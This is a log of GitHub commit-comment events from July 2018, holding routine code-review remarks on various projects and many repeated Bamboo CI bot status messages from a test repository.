{"id":"7924816259","type":"CommitCommentEvent","actor":{"login":"zeffii"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":29610818,"position":null,"line":null,"path":null,"commit_id":"25f2207353aefbd17d96514fc5c981af06f08682","created_at":"2018-07-05T18:19:42Z","updated_at":"2018-07-05T18:19:42Z","author_association":"COLLABORATOR","body":"- might be useful to add a test for number of fcurves, so not allow the user to pick anything higher than what exists.\r\n- increase docs usefulness (probably best done by dedicated users)"}},"created_at":"2018-07-05T18:19:42Z"}
{"id":"7924819681","type":"CommitCommentEvent","actor":{"login":"swastik009"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29610832,"position":null,"line":null,"path":null,"commit_id":"638c50c6bd42e356cef39706699429aff19be44e","created_at":"2018-07-05T18:20:28Z","updated_at":"2018-07-05T18:20:28Z","author_association":"NONE","body":"@jdecuirm Thanks alot. A real hero :D "}},"created_at":"2018-07-05T18:20:28Z"}
{"id":"7924823152","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610839,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-05T18:21:14Z","updated_at":"2018-07-05T18:21:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:21:14Z"}
{"id":"7924823867","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610843,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-05T18:21:23Z","updated_at":"2018-07-05T18:21:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:21:23Z"}
{"id":"7924824991","type":"CommitCommentEvent","actor":{"login":"julianlam"},"repo":{"name":"NodeBB/nodebb-theme-persona"},"payload":{"comment":{"id":29610847,"position":null,"line":null,"path":null,"commit_id":"974cbe521c3cde074dea1b0408cf1c7bf26b88ca","created_at":"2018-07-05T18:21:37Z","updated_at":"2018-07-05T18:21:37Z","author_association":"MEMBER","body":"nodebb/nodebb#6560"}},"created_at":"2018-07-05T18:21:37Z"}
{"id":"7924825837","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29610848,"position":null,"line":null,"path":null,"commit_id":"1fee8c929536a3d506bb937b4974313935a55386","created_at":"2018-07-05T18:21:48Z","updated_at":"2018-07-05T18:21:48Z","author_association":"NONE","body":"I can't seem to find my through it to comment in-line. \r\n\r\nLine 33: Separate `require` are more readable then complex expressions with `&&`. \r\nLine 52: Treat the event emitter as a state change and put it ahead of the `transfer`. \r\nLine 39: What about `balances[msg.sender] += 1;` ?"}},"created_at":"2018-07-05T18:21:48Z"}
{"id":"7924826220","type":"CommitCommentEvent","actor":{"login":"bigdogmat"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":29610850,"position":5,"line":97,"path":"lua/entities/gmod_wire_expression2/core/init.lua","commit_id":"3d6ff50a37d9c91c542cf58895623a5394561289","created_at":"2018-07-05T18:21:53Z","updated_at":"2018-07-05T18:21:53Z","author_association":"MEMBER","body":"Lua patterns are very limited in relation to regex. The best you could do with them is ```lua\r\nreturn id:match(\"^x..$\") or id:match(\"^.$\")\r\n```"}},"created_at":"2018-07-05T18:21:53Z"}
{"id":"7924827143","type":"CommitCommentEvent","actor":{"login":"mabre"},"repo":{"name":"fscs/USDX"},"payload":{"comment":{"id":29610852,"position":null,"line":null,"path":null,"commit_id":"ae44d471007e28a934acdec27d580a14d5ce72e8","created_at":"2018-07-05T18:22:07Z","updated_at":"2018-07-05T18:22:07Z","author_association":"NONE","body":"> Any reason against contributing at the main repo?\r\n\r\nWell, not really. I forked the repo to give our two local patches a decent home. Our lyrics-on-top theme (80b560d3f02a6377c33e93d9e2ea97e60eae107c) could actually go in the main repo (if implemented as separate theme), but disabling the song search filter (06de3cad0b44892f867368acd702041b17a2447e) is probably no good idea for the official version."}},"created_at":"2018-07-05T18:22:07Z"}
{"id":"7924828439","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610862,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-05T18:22:23Z","updated_at":"2018-07-05T18:22:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:22:23Z"}
{"id":"7924829521","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610865,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-05T18:22:36Z","updated_at":"2018-07-05T18:22:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:22:36Z"}
{"id":"7924830405","type":"CommitCommentEvent","actor":{"login":"gegy1000"},"repo":{"name":"FossilsArcheologyRevival/FossilsArcheologyRevival"},"payload":{"comment":{"id":29610870,"position":23,"line":47,"path":"src/main/java/fossilsarcheology/server/entity/ai/DinoAIWander.java","commit_id":"56b50c2cf460555eedbc8e9b1956ffbc2eb63b49","created_at":"2018-07-05T18:22:47Z","updated_at":"2018-07-05T18:22:47Z","author_association":"CONTRIBUTOR","body":"Probably should remove this debug logging."}},"created_at":"2018-07-05T18:22:47Z"}
{"id":"7924833108","type":"CommitCommentEvent","actor":{"login":"Alex-the-666"},"repo":{"name":"FossilsArcheologyRevival/FossilsArcheologyRevival"},"payload":{"comment":{"id":29610876,"position":23,"line":47,"path":"src/main/java/fossilsarcheology/server/entity/ai/DinoAIWander.java","commit_id":"56b50c2cf460555eedbc8e9b1956ffbc2eb63b49","created_at":"2018-07-05T18:23:22Z","updated_at":"2018-07-05T18:23:22Z","author_association":"CONTRIBUTOR","body":"yes"}},"created_at":"2018-07-05T18:23:22Z"}
{"id":"7924833819","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610882,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T18:23:31Z","updated_at":"2018-07-05T18:23:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:23:31Z"}
{"id":"7924834694","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610886,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-05T18:23:41Z","updated_at":"2018-07-05T18:23:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:23:41Z"}
{"id":"7924835268","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610892,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-05T18:23:48Z","updated_at":"2018-07-05T18:23:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:23:48Z"}
{"id":"7924838113","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29610897,"position":20,"line":20,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-05T18:24:24Z","updated_at":"2018-07-05T18:24:24Z","author_association":"NONE","body":"1. если ты про вот этот пункт: \"Может возвращать список всех поездов на станции, находящиеся в текущий момент\", то он у тебя уже реализован в строке номер 8 - у тебя же там определен ридер для этой переменной, именно он и будет возвращать список поездов на станции\r\n2. если метод должен возвращать, то зачем в его названии слово `print` ? \"возвращать\" и \"печатать\" - это два совершенно разных момента\r\nесли написать в консоли свой метод, который будет складывать 1 и 2, то он **вернет** 3\r\nвот так:\r\n```\r\nirb\r\n2.5.0 :001 > def some_method\r\n2.5.0 :002?>   1 + 2\r\n2.5.0 :003?>   end\r\n => :some_method\r\n2.5.0 :004 > some_method\r\n => 3\r\n2.5.0 :005 > a = some_method\r\n => 3\r\n2.5.0 :006 > a\r\n => 3\r\n2.5.0 :007 >\r\n```\r\nвидно, что если результат работы метода присвоить переменной, то в ней окажется значение 3, т.е. результат вычислений... потому что именно его **возвращает** метод\r\n\r\nа можно переписать этот же метод, так, что он будет **выводить** значение:\r\n\r\n```\r\nirb\r\n2.5.0 :001 > def some_method\r\n2.5.0 :002?>   puts 1 + 2\r\n2.5.0 :003?>   end\r\n => :some_method\r\n2.5.0 :004 > some_method\r\n3\r\n => nil\r\n2.5.0 :005 > a = some_method\r\n3\r\n => nil\r\n2.5.0 :006 > a\r\n => nil\r\n2.5.0 :007 >\r\n```\r\nи на этом примере видно, что хотя метод и **выводит** результат вычислений в консоль, но **возвращает** он `nil`, потому что именно это значение **возвращает** метод `puts`, который выполняется в последней строке нашего метода и в переменную присваивается возвращаемое методом значение, т.е. `nil`\r\n\r\n"}},"created_at":"2018-07-05T18:24:24Z"}
{"id":"7924857540","type":"CommitCommentEvent","actor":{"login":"Vee85"},"repo":{"name":"Vee85/GIMP_plugins"},"payload":{"comment":{"id":29610963,"position":null,"line":null,"path":null,"commit_id":"ba2c282d648a50a71f253ac0e55c29a172fa8355","created_at":"2018-07-05T18:28:35Z","updated_at":"2018-07-05T18:28:35Z","author_association":"OWNER","body":"Also ground color for the baseland has been added."}},"created_at":"2018-07-05T18:28:35Z"}
{"id":"7924857662","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610964,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-05T18:28:37Z","updated_at":"2018-07-05T18:28:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:28:37Z"}
{"id":"7924860229","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610972,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-05T18:29:10Z","updated_at":"2018-07-05T18:29:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:29:10Z"}
{"id":"7924860747","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29610973,"position":6,"line":6,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-05T18:29:16Z","updated_at":"2018-07-05T18:29:16Z","author_association":"NONE","body":"I would call this `RemittanceStruct` to describe exactly what it is and so \"Payment\" is not mentally mixed up with other interpretations. "}},"created_at":"2018-07-05T18:29:16Z"}
{"id":"7924861180","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610974,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-05T18:29:22Z","updated_at":"2018-07-05T18:29:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:29:22Z"}
{"id":"7924861755","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29610979,"position":2,"line":2,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:29:31Z","updated_at":"2018-07-05T18:29:31Z","author_association":"NONE","body":"AppRegistry здесь не используется, нужно было удалить"}},"created_at":"2018-07-05T18:29:31Z"}
{"id":"7924862754","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29610993,"position":null,"line":null,"path":null,"commit_id":"6a7fb3f7bdc68b41126d3fd4431b743e24fe71cf","created_at":"2018-07-05T18:29:44Z","updated_at":"2018-07-05T18:29:44Z","author_association":"OWNER","body":"You could have left the text, it had interesting info about `bib2gls`. :wink: "}},"created_at":"2018-07-05T18:29:44Z"}
{"id":"7924863080","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29610995,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-05T18:29:48Z","updated_at":"2018-07-05T18:29:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:29:48Z"}
{"id":"7924863196","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29610996,"position":10,"line":10,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-05T18:29:49Z","updated_at":"2018-07-05T18:29:49Z","author_association":"NONE","body":"I don't see the msg.sender here. That will make it difficult to safely refund the money to the sender, if needed. "}},"created_at":"2018-07-05T18:29:49Z"}
{"id":"7924865770","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611017,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-05T18:30:21Z","updated_at":"2018-07-05T18:30:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:30:21Z"}
{"id":"7924866586","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611021,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-05T18:30:31Z","updated_at":"2018-07-05T18:30:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:30:31Z"}
{"id":"7924867465","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611022,"position":43,"line":43,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:30:42Z","updated_at":"2018-07-05T18:30:42Z","author_association":"NONE","body":"text нужно было на новой строке написать"}},"created_at":"2018-07-05T18:30:42Z"}
{"id":"7924868931","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611026,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-05T18:30:59Z","updated_at":"2018-07-05T18:30:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:30:59Z"}
{"id":"7924870677","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611032,"position":53,"line":53,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:31:21Z","updated_at":"2018-07-05T18:31:21Z","author_association":"NONE","body":"Если используешь access modifier-ы, используй их везде.\r\n`public state = {`"}},"created_at":"2018-07-05T18:31:21Z"}
{"id":"7924870731","type":"CommitCommentEvent","actor":{"login":"ramezrafla"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":29611033,"position":null,"line":null,"path":null,"commit_id":"9fffeac881cea7ba595a7015fbce8c5f1f838aea","created_at":"2018-07-05T18:31:21Z","updated_at":"2018-07-05T18:31:21Z","author_association":"CONTRIBUTOR","body":"Forgot to mention that we set ‘unused’ to true"}},"created_at":"2018-07-05T18:31:21Z"}
{"id":"7924870738","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29611034,"position":258,"line":258,"path":"src/scrape_and_parse.py","commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T18:31:21Z","updated_at":"2018-07-05T18:31:21Z","author_association":"NONE","body":"If logging functions have failed do not pass on handling the exception, especially when this is passing on ALL exceptions. Ensure that the except statement has the correct exception class, if you can't handle the exception then use 'raise' to re-raise the exception. Note that this results in an unhandled exception and will terminate the program but this behaviour is correct and preferable to having unhandled exceptions ignored that may corrupt output or cause a later crash."}},"created_at":"2018-07-05T18:31:21Z"}
{"id":"7924870913","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29611035,"position":20,"line":20,"path":"station.rb","commit_id":"bbd9c87f24811b8112c5d127ab3fc18e097edc54","created_at":"2018-07-05T18:31:23Z","updated_at":"2018-07-05T18:31:23Z","author_association":"NONE","body":"3. ты пишешь: \"посчитал что обращение через имени станций будет правильнее, так как он укажет из какой станций возвращать поезда\", что неверно\r\nметоды вызываются у объектов класса\r\nесли класс `Station`, то мы можем создать объект этого класса\r\n```ruby\r\nstation = Station.new('SomeName')\r\n```\r\nдалее, если у нас в классе есть метод, к примеру пусть он называется `trains`, то мы можем у этого объекта вызвать этот метод: `station.trains`\r\nпусть для простоты он выглядит так:\r\n```ruby\r\ndef trains\r\n  @trains\r\nend\r\n```\r\nи не нужно передавать никакого имени в этот метод, чтобы указать на станцию\r\nмы же вызываем метод у определенного объекта, поезда именно этого объекта, этой станции нам и вернутся с этим вызовом\r\nвернется содержимое переменной `@trains` станции с именем `SomeName`, потому что у этой станции был вызван метод"}},"created_at":"2018-07-05T18:31:23Z"}
{"id":"7924871448","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611039,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-05T18:31:31Z","updated_at":"2018-07-05T18:31:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:31:31Z"}
{"id":"7924871725","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611046,"position":58,"line":58,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:31:34Z","updated_at":"2018-07-05T18:31:34Z","author_association":"NONE","body":"Удаляй console.log-и"}},"created_at":"2018-07-05T18:31:34Z"}
